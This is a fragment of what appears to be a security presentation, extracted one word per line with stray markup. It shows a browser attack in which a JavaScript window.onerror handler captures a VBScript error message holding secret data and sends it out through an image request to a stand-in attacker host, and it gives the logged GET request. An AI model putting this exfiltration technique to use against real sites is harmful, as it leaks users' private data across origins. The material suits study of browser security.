! catch
error
msg
with
error
handler
GET
http://attacker.utf-‐8.jp/log?Type%20mismatch:%20'
%20"secret",%20"message",%20"is",%20"here"%20'
HTTP/1.1
Referer:
http://attacker.utf-‐8.jp/
User-‐Agent:
Mozilla/5.0
(compatible;
MSIE
10.0;
Windows
NT
6.1;
WOW64;
Trident/6.0)
<br/>window.onerror
=
function(
e
){
<br/>
document.getElementById(
"img"
).setAttribute(
<br/>
"src",
"http://attacker.utf-‐8.jp/log?"
+
e
);
<br/>}
<br/>
language="vbscript">